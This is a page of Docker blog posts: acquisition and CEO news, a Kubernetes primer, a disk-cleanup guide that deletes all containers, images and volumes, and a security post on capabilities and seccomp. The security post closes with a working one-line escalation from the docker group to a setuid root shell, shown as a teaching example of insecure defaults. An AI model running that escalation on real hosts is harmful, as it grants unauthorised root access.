Nov
13
2019
--

Mirantis acquires Docker Enterprise

Mirantis today announced that it has acquired Docker’s Enterprise business and team. Docker Enterprise was very much the heart of Docker’s product lineup, so this sale leaves Docker as a shell of its former, high-flying unicorn self. Docker itself, which installed a new CEO earlier this year, says it will continue to focus on tools that will advance developers’ workflows. Mirantis will keep the Docker Enterprise brand alive, though, which will surely not create any confusion.

With this deal, Mirantis is acquiring Docker Enterprise Technology Platform and all associated IP: Docker Enterprise Engine, Docker Trusted Registry, Docker Unified Control Plane and Docker CLI. It will also inherit all Docker Enterprise customers and contracts, as well as its strategic technology alliances and partner programs. Docker and Mirantis say they will both continue to work on the Docker platform’s open-source pieces.

The companies did not disclose the price of the acquisition, but it’s surely nowhere near Docker’s valuation during any of its last funding rounds. Indeed, it’s no secret that Docker’s fortunes changed quite a bit over the years, from leading the container revolution to becoming somewhat of an afterthought after Google open-sourced Kubernetes and the rest of the industry coalesced around it. It still had a healthy enterprise business, though, with plenty of customers among large enterprises. The company says about a third of Fortune 100 and a fifth of Global 500 companies use Docker Enterprise, which is a statistic most companies would love to be able to highlight — and which makes this sale a bit puzzling from Docker’s side, unless the company assumed that few of these customers were going to continue to bet on its technology.

Update: for reasons only known to Docker’s communications team, we weren’t told about this beforehand, but the company also today announced that it has raised a $35 million funding round from Benchmark. This doesn’t change the overall gist of the story below, but it does highlight the company’s new direction.

Here is what Docker itself had to say. “Docker is ushering in a new era with a return to our roots by focusing on advancing developers’ workflows when building, sharing and running modern applications. As part of this refocus, Mirantis announced it has acquired the Docker Enterprise platform business,” Docker said in a statement when asked about this change. “Moving forward, we will expand Docker Desktop and Docker Hub’s roles in the developer workflow for modern apps. Specifically, we are investing in expanding our cloud services to enable developers to quickly discover technologies for use when building applications, to easily share these apps with teammates and the community, and to run apps frictionlessly on any Kubernetes endpoint, whether locally or in the cloud.”

Mirantis itself, too, went through its ups and downs. While it started as a well-funded OpenStack distribution, today’s Mirantis focuses on offering a Kubernetes-centric on-premises cloud platform and application delivery. As the company’s CEO Adrian Ionel told me ahead of today’s announcement, today is possibly the most important day for the company.

So what will Mirantis do with Docker Enterprise? “Docker Enterprise is absolutely aligned and an accelerator of the direction that we were already on,” Ionel told me. “We were very much moving towards Kubernetes and containers aimed at multi-cloud and hybrid and edge use cases, with these goals to deliver a consistent experience to developers on any infrastructure anywhere — public clouds, hybrid clouds, multi-cloud and edge use cases — and make it very easy, on-demand, and remove any operational concerns or burdens for developers or infrastructure owners.”

Mirantis previously had about 450 employees. With this acquisition, it gains another 300 former Docker employees that it needs to integrate into its organization. Docker’s field marketing and sales teams will remain separate for some time, though, Ionel said, before they will be integrated. “Our most important goal is to create no disruptions for customers,” he noted. “So we’ll maintain an excellent customer experience, while at the same time bringing the teams together.”

This also means that for current Docker Enterprise customers, nothing will change in the near future. Mirantis says that it will accelerate the development of the product and merge its Kubernetes and lifecycle management technology into it. Over time, it will also offer a managed services solution for Docker Enterprise.

While there is already some overlap between Mirantis’ and Docker Enterprise’s customer base, Mirantis will pick up about 700 new enterprise customers with this acquisition.

With this, Ionel argues, Mirantis is positioned to go up against large players like VMware and IBM/Red Hat. “We are the one real cloud-native player with meaningful scale to provide an alternative to them without lock-in into a legacy or existing technology stack.”

While this is clearly a day the Mirantis team is celebrating, it’s hard not to look at this as the end of an era for Docker, too. The company says it will share more about its future plans today, but didn’t make any spokespeople available ahead of this announcement.

Aug
27
2019
--

Kubernetes – Introduction to Containers


Here at Percona’s Training and Education department, we are always working to keep our materials up-to-date and relevant to current technologies. In addition, we keep an eye out for which topics are “hot” and generating a lot of buzz. Unless you’ve been living under a rock for the past year, Kubernetes is the current buzzword/technology. This is the first post in this blog series where we will dive into Kubernetes and explore using it with Percona XtraDB Cluster.

Editor Disclaimer: This post is not intended to convince you to switch to a containerized environment. This post is simply aimed to educate about a growing trend in the industry.

In The Beginning…

Let’s start at the beginning. First, there were hardware-based servers; we still have these today. Despite the prevalence of “the cloud”, many large companies still use private datacenters and run their databases and applications “the traditional way.” Stepping up from hardware, we venture into virtual machine territory. Popular solutions here are VMware (a commercial product), QEMU, KVM, and VirtualBox (the latter three are OSS).

Virtual Machines (VM) abstract away the hardware on which they are running using emulation software; this is generally referred to as the hypervisor. Such a methodology allows for an entirely separate operating system (OS) to run “on top of” the OS running natively against the hardware. For example, you may have CentOS 7 running inside a VM, which in turn, is running on your Mac laptop, or you could have Windows 10 running inside a VM, which is running on your Ubuntu 18 desktop PC.

There are several nice things about using VMs in your infrastructure. One of those is the ability to move a VM from one server to another. Likewise, deploying 10 more VMs just like the first one is usually just a couple of clicks or a few commands. Another is a better utilization of hardware resources. If your servers have 8 CPU cores and 128GB of memory, running one application on that server might not fully utilize all that hardware. Instead, you could run multiple VMs on that one server, thus taking advantage of all the resources. Additionally, using a VM allows you to bundle your application, and all associated libraries, and configs into one “unit” that can be deployed and copied very easily (We’ll come back to this concept in a minute).

One of the major downsides of the VM solution is the fact that you have an entire, separate OS running.  It is a huge waste of resources to run a CentOS 7 VM on top of a CentOS 7 hardware server.  If you have 5 CentOS 7 VMs running, you have five separate Linux kernels (in addition to the host kernel), five separate copies of /usr, and five separate copies of the same libraries and application code taking up precious memory. Some might say that, in this setup, 90-99% of each VM is duplicating efforts already being made by the base OS. Additionally, each VM is dealing with its own CPU context-switching management. Also, what happens when one VM needs a bit more CPU than another? There exists the concept of CPU “stealing,” where one VM can take CPU from another VM. Imagine if that was your critical DB that had CPU stolen!

What if you could eliminate all that duplication but still give your application the ability to be bundled and deployed across tens or hundreds of servers with just a few commands? Enter: containers.

What is a Container?

Simply put, a container is a type of “lightweight” virtual machine without all the overhead of running an independent operating system on top of a hypervisor. A container can be as small as a single line script or as large as <insert super complicated application with lots of libraries, code, images, etc.>.

With containers, you essentially get all of the “pros” surrounding VMs with far fewer “cons,” mainly in the area of performance. A container is not an emulation, like VMs. On Linux, the kernel provides control groups (cgroups) functionality, which can limit and isolate CPU, memory, disk, and network. This act of isolation becomes the container; everything needed is ‘contained’ in one place/group. In more advanced setups, these cgroups can even limit/throttle the amount of resources given to each container. With containers, there is no need for an additional OS install; no emulation, no hypervisor. Because of this, you can achieve “near bare-metal performance” while using containers.
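
As a quick, hedged illustration (the nginx image, names, and limit values below are arbitrary examples, not from the original post), Docker exposes those cgroup controls directly as flags on docker run:

# Cap the container at two CPUs and 1GB of memory via cgroups
docker run -d --name limited-app --cpus="2" --memory="1g" nginx

# Confirm the limits Docker recorded for the container
docker inspect --format '{{.HostConfig.NanoCpus}} {{.HostConfig.Memory}}' limited-app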

Containers, and any applications running inside the containers, run inside their own, isolated, namespace, and thus, a container can only see its own process, disk contents, devices assigned, and granted network access.

Much like VMs, containers can be started, stopped, and copied from machine to machine, making deployment of applications across hundreds of servers quite easy.

One potential downside to containers is that they are inherently stateless. This means that if you have a running container, and make a change to its configuration or update a library, etc., that state is not saved if the container is restarted. The initial state of the launched container will be restored on restart. That said, most container implementations provide a method for supplying external storage which can hold stateful information to survive a restart or redeployment.
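
For example (a minimal sketch; the mysql image, names, and password are arbitrary stand-ins), a named volume holds data that survives the container being removed and recreated:

# Create a named volume and mount it as the database data directory
docker volume create mydata
docker run -d --name db -v mydata:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=secret mysql:8.0

# Recreating the container reattaches the same volume, so the data is still there
docker rm -f db
docker run -d --name db -v mydata:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=secret mysql:8.0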

Dock the Ship, Capt’n

The concept of “containers” is generic. Many different implementations of containers exist, much like different distributions of Linux. The most popular implementation of containers in the Linux space is Docker. Docker is free, open-source software, but can also be sold with a commercial license for more advanced features. Docker is built upon one of the earlier Linux container implementations, LXC.

Docker uses the concept of “images” to distribute containers. For example, you can download and install the Percona MySQL 8.0 image to your server, and from that image, create as many separate, independent containers of ‘Percona MySQL 8’ as your hardware can handle. Without getting too deep into the specifics, Docker images are the end result of multiple compressed layers which were used during the building process of this image. Herein lies another pro for Docker. If multiple images share common layers, there only needs to be one copy of that layer on any system, thus the potential for space savings can be huge.
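
You can inspect those layers yourself; a brief sketch (output omitted for brevity):

# Pull an image and list the layers it was built from
docker pull percona/percona-server:8.0
docker history percona/percona-server:8.0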

Another nice feature of Docker containers is their built-in versioning capability. If you are familiar with the version control software Git, then you should know the concept of “tags,” which is extremely similar to Docker tags. These tags allow you to track and specify Docker images when creating and deploying images. For example, using the same image (percona/percona-server), you can deploy percona/percona-server:5.7 or percona/percona-server:8.0. In this example, “5.7” and “8.0” are the tags used.
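
A minimal example of working with those tags from the command line:

# Pull two versions of the same image, distinguished only by tag
docker pull percona/percona-server:5.7
docker pull percona/percona-server:8.0

# List the local copies; the TAG column separates the two
docker image ls percona/percona-server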

Docker also has a huge community ecosystem for sharing images. Visit https://hub.docker.com/ and search for just about any popular OSS project and you will probably find out that someone has already created an image for you to utilize.

Too Many Ships at Port

Docker containers are extremely simple to maintain, deploy, and use within your infrastructure. But what happens when you have hundreds of servers, and you’re trying to manage thousands of docker containers? Sure, if one server goes down, all you need to do, technically speaking, is re-launch those downed containers on another server. Do you have another server in your sea of servers with enough free capacity to handle this additional load? What if you were using persistent storage and need that volume moved along with the container? Running and managing large installations of containers can quickly become overwhelming.

Now we will discuss the topic of container orchestration.

Kubernetes

Kubernetes is pronounced koo-ber-net-ies and is often abbreviated K8S (there are 8 letters between the ‘K’ and the last ‘S’). It is the current mainstream project for managing Docker containers at very large scale. The name is Greek for “governor”, “helmsman”, or “captain”. Rather than repeating it here, you can read more about the history of K8S on your own.

Terminology

As you might have imagined, K8S has many moving parts. Take a look at the diagram below.

[Kubernetes architecture diagram]

Source: Wikipedia (modified)

Nodes

At the bottom of the image are two ‘Kubernetes Nodes’. These are usually your physical hardware servers, but could also be VMs at your cloud provider. These nodes will have a minimum OS installed, along with other necessary packages like K8S and Docker.

Kubelet is a management binary used by K8S to watch existing containers, run health checks, and launch new containers.

Kube-proxy is a simple port-mapping proxy service. Let’s say you had a simple webserver running as a container on 172.14.11.109:34223. Your end-users would access an external/public IP over 443 like normal, and kube-proxy would map/route that external access to the correct internal container.
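
As a hedged sketch of that idea (assuming a Deployment named webserver already exists; the names and ports simply echo the example above), exposing it as a Service is what puts kube-proxy to work:

# Create a Service that forwards port 443 to the webserver pods' port 34223
kubectl expose deployment webserver --name=webserver-svc --port=443 --target-port=34223

# kube-proxy on every node programs the forwarding rules for the Service's IP
kubectl get service webserver-svc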

Pods

The next concept to understand is a pod. This is typically the base term used when discussing what is running on a node. A pod can be a single container or can be an entire setup, running multiple containers, with mapped external storage, that should be grouped together as a single unit.

Networking

Networking within K8S is a complex topic, and a deep discussion is not suitable for this post. At an entry level, what you need to know is that K8S creates an “overlay” network, allowing a container in a pod on node1 to talk to a container in a pod on node322, which is in another datacenter. Should your company policy require it, you can create multiple overlay networks across your entire K8S deployment and use them as a way to isolate traffic between pods (i.e., think old-school VLANs).

Master Node

At the top of the diagram, you can see the developer/operator interacting with the K8S master node. This node runs several processes which are critical to K8S operation:

kube-apiserver: A simple server to handle/route/process API requests from other K8S tools and even your own custom tools.

etcd: A highly available key-value store. This is where K8S stores all of its stateful data.

kube-scheduler: Manages inventory and decides where to launch new pods based on available node resources.

You might have noticed that there is only 1 master node in the above diagram. This is the default installation. This is not highly available and should the master node go down, the entire K8S infrastructure will go down with it. In a true production environment, it is highly recommended that you run the master node in a highly-available manner.

Wrap It Up

In this post, we discussed how traditional hardware-based setups have been slowly migrating, first towards virtual machine setups and now to containerized deployments. We brought up the issues surrounding managing large container environments and introduced the leading container orchestration platform, Kubernetes. Lastly, we dove into K8S’s various components and architecture.

Once you have your K8S cluster set up with a master node, and many worker nodes, you’ll finally be able to launch some pods and have services accessible. This is what we will do in part 2 of this blog series.

Aug
21
2019
--

Cleaning Docker Disk Space Usage


While testing our PMM2 Beta and other Dockerized applications, you may want to clean up your Docker install and start from scratch. If you’re not very familiar with Docker, it may not be that trivial. This post focuses on cleaning up everything in Docker so you can “start from scratch,” which means removing all your containers and their data. Make sure this is what you really want!

First, you have running (and stopped) containers:

root@pmm2-test:~# docker ps -a
CONTAINER ID        IMAGE                               COMMAND                CREATED             STATUS              PORTS                                      NAMES
810fef9a2a05        perconalab/pmm-server:2.0.0-beta5   "/opt/entrypoint.sh"   2 weeks ago         Up 2 weeks          0.0.0.0:80->80/tcp, 0.0.0.0:443->443/tcp   pmm-server-2.0.0-beta5
7e2595b2b7ad        perconalab/pmm-server:2.0.0-beta5   "/bin/true"            2 weeks ago         Created                                                        pmm-data-2-0-0-beta5

These you can stop and remove:

root@pmm2-test:~# docker stop $(docker ps -a -q) && docker rm $(docker ps -a -q)
810fef9a2a05
7e2595b2b7ad
810fef9a2a05
7e2595b2b7ad

You may feel like you are done at this point, but not really. You may have a lot of disk space held up in other Docker objects:

root@pmm2-test:~# docker system df
TYPE                TOTAL               ACTIVE              SIZE                RECLAIMABLE
Images              1                   0                   1.331GB             1.331GB (100%)
Containers          0                   0                   0B                  0B
Local Volumes       1                   0                   52.61GB             52.61GB (100%)
Build Cache         0                   0                   0B                  0B

Now we can see that we have about 1GB still held up in images and the larger amount of 52GB in local volumes. To clean these up, we want to see their names, which you can do with the same “df” command:

root@pmm2-test:~# docker system df -v
Images space usage:

REPOSITORY              TAG                 IMAGE ID            CREATED             SIZE                SHARED SIZE         UNIQUE SIZE         CONTAINERS
perconalab/pmm-server   2.0.0-beta5         9b3111808907        2 weeks ago         1.331GB             0B                  1.331GB             0

Containers space usage:

CONTAINER ID        IMAGE               COMMAND             LOCAL VOLUMES       SIZE                CREATED             STATUS              NAMES

Local Volumes space usage:

VOLUME NAME                                                        LINKS               SIZE
a3e9e89f3c43bdaa817e014d08e73705562a9affe4dae54817d77a1b8ad0c771   0                   52.61GB

Build cache usage: 0B

CACHE ID            CACHE TYPE          SIZE                CREATED             LAST USED           USAGE               SHARED

From here you can, of course, remove volumes and images one by one, but you may choose to do this instead:

Remove All Docker Images:

root@pmm2-test:~# docker image prune -a -f
Deleted Images:
untagged: perconalab/pmm-server:2.0.0-beta5
untagged: perconalab/pmm-server@sha256:55968571b01e1f2b02cee77ef92afa05f93c1a0b8e506ceebc10d03bff9783be
deleted: sha256:9b3111808907a3cd02d4961b114471c8ec16dc0dc430cfd8c4a4f556804e57ec
deleted: sha256:4cb3b12fc91c29837374de51f6279d911c9e21d73d22a009841ac9a00e6a7e96
deleted: sha256:d69483a6face4499acb974449d1303591fcbb5cdce5420f36f8a6607bda11854

Total reclaimed space: 1.331GB

And Remove all Docker Local Volumes:

root@pmm2-test:~#  docker system prune --volumes -f
Deleted Volumes:
a3e9e89f3c43bdaa817e014d08e73705562a9affe4dae54817d77a1b8ad0c771

Total reclaimed space: 52.61GB

We can run “docker system df” again to see if we really cleaned up everything or if anything else remains:

root@pmm2-test:~# docker system df
TYPE                TOTAL               ACTIVE              SIZE                RECLAIMABLE
Images              0                   0                   0B                  0B
Containers          0                   0                   0B                  0B
Local Volumes       0                   0                   0B                  0B
Build Cache         0                   0                   0B                  0B

All clear. We can now have a fresh start with Docker!

Jul
11
2019
--

Docker Security Considerations Part I


Why Docker Security Matters

It is a fact that Docker has found widespread use in recent years, mostly because it is very easy to use as well as fast and easy to deploy when compared with a full-blown virtual machine. More and more servers are being operated as Docker hosts on which micro-services run in containers. From a security point of view, two aspects arise in the context of this blog post, within the inherent limits of what a single post can cover.

First, the answer to the already much-discussed question, “Is it secure?” Second, the less analyzed aspect of incident analysis, and the changes introduced with respect to known methods and evidence. In order to answer the first question, some key facts about Docker need to be noted. The second aspect, being less examined in general, will be covered in a future post in this mini-series about Docker security.

The basic technology that enables containers in Linux is kernel namespaces. These are what allow the kernel to offer private resources to a process, while hiding the resources of other processes, all without actually creating full guest OSes or kernels per process. One very important fact is that containers run without cgroup limitations by default, but CPU and memory usage can be easily constrained with the application of a few flags. Docker presents an option called cgroup-parent for this purpose, and you can check the official Docker documentation on cgroup-parent. Under no circumstances should containers (or any process) be allowed to run on a production server without such cgroup limitations. In addition, predefined resource consumption for containers could help in limiting the costs of cloud infrastructure, since resource needs are better defined, leading to more targeted purchases.
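
A minimal sketch of applying such limits (the parent cgroup name, image, and values are arbitrary examples; with the systemd cgroup driver the parent would be given as a .slice unit instead):

# Place the container under a parent cgroup and constrain its CPU and memory
docker run -d --cgroup-parent=limited-containers --cpus="1" --memory="512m" nginx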

Docker uses a default profile to create a system call whitelist. In this profile, “dangerous” syscalls are missing. If you have a solid understanding of exactly which system calls your containerized process needs, you can customize this profile or write your own to lock out every syscall not needed by your container. Also, note that custom profiles can be applied on a container-by-container basis. In addition, Linux capabilities are another very useful tool when it comes to Docker security. Quoting from the man-pages:

For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process’s credentials (usually: effective UID, effective GID, and supplementary group list).

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.  Capabilities are a per-thread attribute.

In the example below, we can see the basic syntax for manipulating and auditing capabilities. Perhaps the most secure way to run Docker is using the --user flag (no capabilities), but this is not always possible since there is no way to add capabilities to a nonzero UID. In cases where this is needed, running as root with --cap-drop ALL and --cap-add to add back the minimum set of capabilities is the most secure practical configuration. Note that since a Docker container is fundamentally just a process, it’s simple to enforce these permissions at runtime using the native Linux functionality designed to manage capabilities per process. No ‘under-the-hood’ configuration inside the container is required, but it would be required to manipulate the capabilities of groups of processes running in a VM.

A closer look at these should highlight the need to manage them and will give us a better understanding of what’s going on. The default list of capabilities available to privileged processes in a Docker container (mostly quoting https://www.redhat.com/en/blog/secure-your-containers-one-weird-trick) is presented below. A complete list of capabilities can be found at http://man7.org/linux/man-pages/man7/capabilities.7.html. At this point we should note that in Compose file format v3 and above, capabilities can be declared directly in the service definition; e.g.

cap_drop:
  - ALL
cap_add:
  - chown

The default list of capabilities available in a Docker container:

chown:

This is described as the ability to make arbitrary changes to file UIDs and GIDs. Unless you are running a shell inside the container and installing packages into it, this capability should be dropped. If chown is needed, allow it, do the work, and then drop it again.

dac_override:

Short for “discretionary access control override.”

The man pages state that this capability allows root to bypass file read, write, and execute permission checks. It would be odd for any app to need this. As noted by Red Hat security experts, “nothing should need this. If your container needs this, it is probably doing something horrible.”

fowner:

fowner confers the ability to bypass permission checks on operations that normally require the file system UID of the process to match the UID of the file. Quite similar to dac_override. It could be needed for docker build, but it should be dropped when the container is in production.

fsetid:

Quoting the man page “don’t clear set-user-ID and set-group-ID mode bits when a file is modified; set the set-group-ID bit for a file whose GID does not match the file system or any of the supplementary GIDs of the calling process.”

So, if you are not running an installation, you probably do not need this capability.

kill

This capability basically means that a root-owned process can send kill signals to non-root processes. If your container is running all processes as root, or the root processes never kill processes running as non-root, you do not need this capability. If you are running systemd as PID 1 inside of a container, and you want to stop a container running with a different UID, you might need this capability.

setgid

In short, a process with this capability can change its GID to any other GID. Basically allows full group access to all files on the system. If your container processes do not change UIDs/GIDs, they do not need this capability.

setuid

A process with this capability can change its UID to any other UID. Basically, it allows full access to all files on the system. If your container processes do not change UIDs/GIDs always running as the same UID, preferably non-root, they do not need this capability. Applications that need setuid usually start as root in order to bind to ports below 1024 and then change their UIDS and drop capabilities. Apache binding to port 80 requires net_bind_service, usually starting as root. It then needs setuid/setgid to switch to the apache user and drop capabilities. Most containers can safely drop setuid/setgid capability.

setpcap

From the man page description: “Add any capability from the calling thread’s bounding set to its inheritable set; drop capabilities from the bounding set (via prctl(2) PR_CAPBSET_DROP); make changes to the securebits flags.”

A process with this capability can change its current capability set within its bounding set. Meaning a process could drop capabilities or add capabilities if it did not currently have them, but is limited by the bounding set capabilities.

net_bind_service

If you have this capability, you can bind to privileged ports (< 1024).

When binding to a port below 1024 is needed, this capability will do the job. For services that listen on a port above 1024, this capability should be dropped. The risk of this capability is a rogue process impersonating a service like sshd and collecting user passwords. Running a container in a different network namespace reduces the risk of this capability, since it would be difficult for the container process to get to the public network interface.

net_raw

This access allows a process to spy on packets on its network. Most container processes would not need this access so it probably should be dropped. Note this would only affect the containers that share the same network that your container process is running on, usually preventing access to the real network. RAW sockets also give an attacker the ability to inject almost anything onto the network.

sys_chroot

This capability allows the use of chroot(). In other words, it allows your processes to chroot into a different rootfs. chroot is probably not used within your container, so it should be dropped.

mknod

If you have this capability, you can create special files using mknod.

This allows your processes to create device nodes. Containers are usually provided all of the device nodes they need in /dev, so this could and should be dropped by default. Almost no containers ever do this, and even fewer containers should do this.

audit_write

With this capability, you can write a message to the kernel auditing log. Few processes attempt to write to the audit log (login programs, su, sudo) and processes inside of the container are probably not trusted. The audit subsystem is not currently namespace-aware, so this should be dropped by default.

setfcap

Finally, the setfcap capability allows you to set file capabilities on a file system. Might be needed for doing installs during builds, but in production, it should probably be dropped.

The following exercise, the output of which is displayed below, should highlight the way of manipulating capabilities along with some of the points made above.

First, we run a container that changes ownership of the root fs:

Status: Image is up to date for centos:latest
john@seceng:~/Documents/docker-sec$
john@seceng:~/Documents/docker-sec$ docker container run --rm centos:latest chown nobody /
john@seceng:~/Documents/docker-sec$

We can see that the root user is able to execute this without a problem.

Next, we drop all capabilities from the user in the container, and when we try running the above command again, we can see it fails, as the user no longer has the necessary chown capability (or any other root capabilities):

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all centos:latest chown nobody /
chown: changing ownership of '/': Operation not permitted
john@seceng:~/Documents/docker-sec$

Now we add the necessary capability back in:

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all --cap-add chown centos:latest chown nobody /
john@seceng:~/Documents/docker-sec$

Dropping all capabilities and adding back only the required ones makes for the most secure containers. An attacker who breaches this container won’t have any root capabilities except chown.

Now, if we try adding chown to a non-root user, the operation fails, since capability manipulation will not grant additional capabilities under any circumstances to a process run by a non-root user, as shown in the following output.

john@seceng:~/Documents/docker-sec$ docker container run --rm --user 1000:1000 --cap-add chown centos:latest chown nobody /
chown: changing ownership of '/': Operation not permitted
john@seceng:~/Documents/docker-sec$

Another Linux feature that can aid the process of securing our containers is Secure computing mode (seccomp). Seccomp is a Linux kernel feature. You can use it to restrict the actions available within the container. The seccomp() system call operates on the seccomp state of the calling process. You can use this feature to restrict your application’s access.

This feature is available only if Docker has been built with seccomp and the kernel is configured with CONFIG_SECCOMP enabled. More info about the seccomp profiles for Docker can be found here. To check if your kernel supports seccomp:

john@seceng:~/Documents/docker-sec$ grep CONFIG_SECCOMP= /boot/config-$(uname -r)
CONFIG_SECCOMP=y
john@seceng:~/Documents/docker-sec$
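
Once confirmed, a custom profile can be applied per container at run time; a brief sketch (the profile path is a placeholder for one you have written):

# Run a container under a custom seccomp profile instead of Docker's default
docker run --rm --security-opt seccomp=./my-seccomp-profile.json alpine ls /

# Or disable seccomp filtering entirely (not recommended outside of debugging)
docker run --rm --security-opt seccomp=unconfined alpine ls /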

While capabilities and seccomp allow restricting access to root capabilities and system calls, SELinux goes a step further and helps protect the file system of the host from malicious code. Default SELinux labels restrict access to directories and those labels can be changed by the :z and :Z flags when mounting directories to relabel those directories for sharing or private use by containers, respectively.
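
For example (a sketch; the host paths and image are arbitrary):

# :Z relabels the host directory for private use by this container only
docker run -d -v /srv/app-data:/data:Z nginx

# :z applies a shared label so several containers can use the same directory
docker run -d -v /srv/shared-data:/data:z nginx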

Additionally, AppArmor (Application Armor) is a Linux security module that protects an operating system and its applications from security threats. To use it, a system administrator associates an AppArmor security profile with each program. Docker expects to find an AppArmor policy loaded and enforced. Docker automatically generates and loads a default profile for containers named docker-default. On Docker versions 1.13.0 and later, the Docker binary generates this profile in tmpfs and then loads it into the kernel. On Docker versions earlier than 1.13.0, this profile is generated in /etc/apparmor.d/docker instead. It should be noted, though, that this profile is used on containers, not on the Docker daemon. More on AppArmor and Docker can be found at docker’s official documentation.
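
A short sketch of selecting AppArmor profiles at run time (the custom profile name is hypothetical and must already be loaded into the kernel):

# Run explicitly under the default profile Docker generates
docker run --rm --security-opt apparmor=docker-default alpine ls /

# Run under a custom, pre-loaded profile instead
docker run --rm --security-opt apparmor=my-custom-profile alpine ls /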

Last in this list of facts, but certainly not in general, is the default software-defined network firewalling imposed by Docker, and the iptables rules automatically managed by Docker. The Docker Networking Model was designed around software-defined networks exactly so that Docker could easily manage iptables firewall rules on create and destroy operations of Docker networks and containers. Rather than writing complicated iptables rules explicitly, effective firewalling can be imposed on a containerized data center simply by designing and declaring a sensible software-defined network topology.
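
A minimal sketch of that idea (network and container names are arbitrary): creating a user-defined network and attaching containers to it is enough for Docker to generate the corresponding iptables rules and keep that traffic isolated:

# Create an isolated bridge network
docker network create --driver bridge backend

# Containers on "backend" can reach each other by name; other networks are walled off
docker run -d --name api --network backend nginx
docker run -d --name worker --network backend alpine sleep 3600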

Fundamentally, though by no means exclusively, Docker security considerations arise because the Docker daemon runs as root and is being used widely in production systems. Having said that, and taking into account the previously mentioned facts, one can easily understand that misconfiguration, bugs, vulnerabilities or other security issues carry a high risk and impact factor. With this in mind, the following example, which highlights the insecure default configuration of Docker, is probably the best “teaser” for the next part of this post, in which we will cover some recent vulnerabilities and their mitigation.

john@seceng:~/Documents/docker-sec$ id

uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
john@seceng:~/Documents/docker-sec$ whoami

john
john@seceng:~/Documents/docker-sec$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

rootshell-4.4# id
uid=1000(john) gid=1000(john) euid=0(root) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
rootshell-4.4# whoami

root
rootshell-4.4# uname -a

Linux seceng 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5 (2019-06-19) x86_64 GNU/Linux
rootshell-4.4# exit

exit
john@seceng:~/Documents/docker-sec$

 

From user to root, in one line. It’s there by default.

John Lionis, Security Engineer | Percona LLC

May
21
2019
--

Microsoft makes a push for service mesh interoperability

Service meshes. They are the hot new thing in the cloud native computing world. At KubeCon, the bi-annual festival of all things cloud native, Microsoft today announced that it is teaming up with a number of companies in this space to create a generic service mesh interface. This will make it easier for developers to adopt the concept without locking them into a specific technology.

In a world where the number of network endpoints continues to increase as developers launch new micro-services, containers and other systems at a rapid clip, they are making the network smarter again by handling encryption, traffic management and other functions so that the actual applications don’t have to worry about that. With a number of competing service mesh technologies, though, including the likes of Istio and Linkerd, developers currently have to choose which one of these to support.

“I’m really thrilled to see that we were able to pull together a pretty broad consortium of folks from across the industry to help us drive some interoperability in the service mesh space,” Gabe Monroy, Microsoft’s lead product manager for containers and the former CTO of Deis, told me. “This is obviously hot technology — and for good reasons. The cloud-native ecosystem is driving the need for smarter networks and smarter pipes and service mesh technology provides answers.”

The partners here include Buoyant, HashiCorp, Solo.io, Red Hat, AspenMesh, Weaveworks, Docker, Rancher, Pivotal, Kinvolk and VMware. That’s a pretty broad coalition, though it notably doesn’t include cloud heavyweights like Google, the company behind Istio, and AWS.

“In a rapidly evolving ecosystem, having a set of common standards is critical to preserving the best possible end-user experience,” said Idit Levine, founder and CEO of Solo.io. “This was the vision behind SuperGloo — to create an abstraction layer for consistency across different meshes, which led us to the release of Service Mesh Hub last week. We are excited to see service mesh adoption evolve into an industry-level initiative with the SMI specification.”

For the time being, the interoperability features focus on traffic policy, telemetry and traffic management. Monroy argues that these are the most pressing problems right now. He also stressed that this common interface still allows the different service mesh tools to innovate and that developers can always work directly with their APIs when needed. He also stressed that the Service Mesh Interface (SMI), as this new specification is called, does not provide any of its own implementations of these features. It only defines a common set of APIs.

Currently, the most well-known service mesh is probably Istio, which Google, IBM and Lyft launched about two years ago. SMI may just bring a bit more competition to this market since it will allow developers to bet on the overall idea of a service mesh instead of a specific implementation.

In addition to SMI, Microsoft also today announced a couple of other updates around its cloud-native and Kubernetes services. It announced the first alpha of the Helm 3 package manager, for example, as well as the 1.0 release of its Kubernetes extension for Visual Studio Code and the general availability of its AKS virtual nodes, using the open source Virtual Kubelet project.

May
08
2019
--

Steve Singh stepping down as Docker CEO

TechCrunch has learned that Docker CEO Steve Singh will be stepping down after two years at the helm, and former Hortonworks CEO Rob Bearden will be taking over. An email announcement went out this morning to Docker employees.

People close to the company confirmed that Singh will be leaving the CEO position, staying on the job for several months to help Bearden with the transition. He will then remain with the organization in his role as chairman of the board. They indicated that Bearden has been working closely with Singh over the last several months as a candidate to join the board and as a consultant to the executive team.

Singh clicked with him and viewed him as a possible successor, especially given his background with leadership positions at several open-source companies, including taking Hortonworks public before selling to Cloudera last year. Singh apparently saw someone who could take the company to the next level as he moved on. As one person put it, he was tired of working 75 hours a week, but he wanted to leave the company in the hands of a capable steward.

Last week in an interview at DockerCon, the company’s annual customer conference in San Francisco, Singh appeared tired, but also a leader confident in his position, one who saw a bright future for his company. He spoke openly about his leadership philosophy and his efforts to lift the company from the doldrums it was in when he took over two years prior, helping transform it from a mostly free open-source offering into a revenue-generating company with 750 paying enterprise customers.

In fact, he told me that under his leadership the company was on track to become free cash flow positive by the end of this fiscal year, a step he said would mean that Docker would no longer need to seek outside capital. He even talked of the company eventually going public.

Apparently, he felt it was time to pass the torch before the company took those steps, saw a suitable successor in Bearden and offered him the position. While it might have made more sense to announce this at DockerCon with the spotlight focused on the company, it was not a done deal yet by the time the conference was underway in San Francisco, people close to the company explained.

Docker took a $92 million investment last year, which some saw as a sign of continuing struggles for the company, but Singh said he took the money to continue to invest in building revenue-generating enterprise products, some of which were announced at DockerCon last week. He indicated that the company would likely not require any additional investment moving forward.

